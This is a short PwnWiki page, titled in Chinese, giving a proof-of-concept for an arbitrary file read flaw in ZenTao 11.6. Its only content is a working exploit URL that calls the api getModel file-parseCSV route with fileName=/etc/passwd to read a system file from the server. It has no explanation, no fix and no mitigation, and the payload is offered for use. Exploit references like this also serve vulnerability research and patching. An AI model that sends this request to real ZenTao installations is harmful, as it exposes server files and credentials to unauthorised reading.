禪道 11.6 任意文件讀取漏洞

From PwnWiki

POC

http://127.0.0.1/zentaopms_11.6/www/api-getModel-file-parseCSV-fileName=/etc/passwd

Retrieved from "https://pwnwiki.com/index.php?title=禪道_11.6_任意文件讀取漏洞&oldid=1553"